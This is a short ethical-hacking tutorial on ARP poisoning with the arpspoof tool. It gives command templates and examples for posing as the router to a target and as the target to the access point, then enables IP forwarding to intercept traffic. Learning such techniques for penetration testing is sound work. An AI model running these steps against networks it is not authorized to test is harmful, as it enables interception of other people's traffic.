Ethical Hacking - NETWORK PENETRATION TESTING(15)

ARP Poisoning - arpspoof

Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device.

1. Tell the target client that I am the router.

arpspoof i [interface] -t [target IP] [AP IP]

e.g. arpspoof -i wlan0 -t 10.0.0.45 10.0.0.1

2. Tell the AP that I am the target client.

arpspoof -i [interface] -t [AP IP] [target IP]

e.g. arpspoof -i wlan0 -t 10.0.0.1 10.0.0.45

3. Enable IP forward to allow packets to flow through our device without being dropped.

echo 1 >/proc/sys/net/ipv4/ip_forward